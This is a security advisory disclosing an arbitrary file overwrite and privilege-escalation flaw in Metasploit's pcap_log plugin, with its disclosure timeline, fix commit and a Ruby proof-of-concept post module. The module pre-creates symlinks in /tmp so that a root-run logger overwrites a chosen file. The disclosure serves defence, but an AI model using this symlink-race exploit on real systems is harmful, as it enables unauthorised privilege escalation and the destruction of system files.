================ 0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability Author: 0a29406d9794e4f9b30b3c5d6702c708 twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940 ================ Description: ================ Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug which can further be leveraged to insert user-controlled data resulting in potential escalation of privileges ================ Timeline: ================ 16 July 2012 - Reported 16 July 2012 - Acknowledged & fixed by HD Moore https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740 16 July 2012 - Public disclosure http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html ================ Details: ================ By default the pcap_log plugin (plugins/pcap_log.rb) logs pcap to a file like '/tmp/msf3-session_2012-07-16_15-15-35.pcap'. This is of course is predictable so a simple 'ln' in advance to a privileged file will result in arbitrary file overwrite. The module has to run as root. Here's the fun part - by sending packets we can then insert our own content into any file (surrounded by pcap headers and all the other packets) ====== Sample PoC (needs work) modules/post/linux/exploit/metasploit_pcaplog.rb ====== # $Id$ ## ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/linux/system' class Metasploit3 < Msf::Post include Msf::Post::Common include Msf::Post::File include Msf::Post::Linux::System def initialize(info={}) super( update_info( info, 'Name' => 'Metasploit plugin "pcap_log" arbirary file overwrite / privilege escalation', 'Description' => %q{ Post exploitation module to exploit 0A29-12-2, a vulnerability in metasploit pcap_log plugin. Depending on the file you choose to overwrite, you will need to netcat/telnet etc. the data that you wish to appear in the file.}, 'License' => MSF_LICENSE, 'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'], 'Version' => '$Revision$', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'References' => [ [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html' ], [ 'URL', 'https://github.com/rapid7/metasploit-framework/commit/428a98c1d1d5341d32ffe0ed380d06a327ed2740' ] ], 'DisclosureDate'=> "July 16 2012" )) register_options([ OptInt.new('NUMBER', [true, 'Number of seconds to prime /tmp/ with', nil]), OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil]), ], self.class) end def link(t) file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [ "msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec ] fname = ::File.join("/tmp", file_part) retval = session.shell_command("/bin/ln #{datastore['FILE']} #{fname}") end # Run Method for when run command is issued def run for i in 0..(datastore['NUMBER']) link(Time.now+1) end print_status("Set #{datastore['NUMBER']} links.") end def cleanup print_status("Manual cleanup required: rm -f /tmp/msf3-session*") end end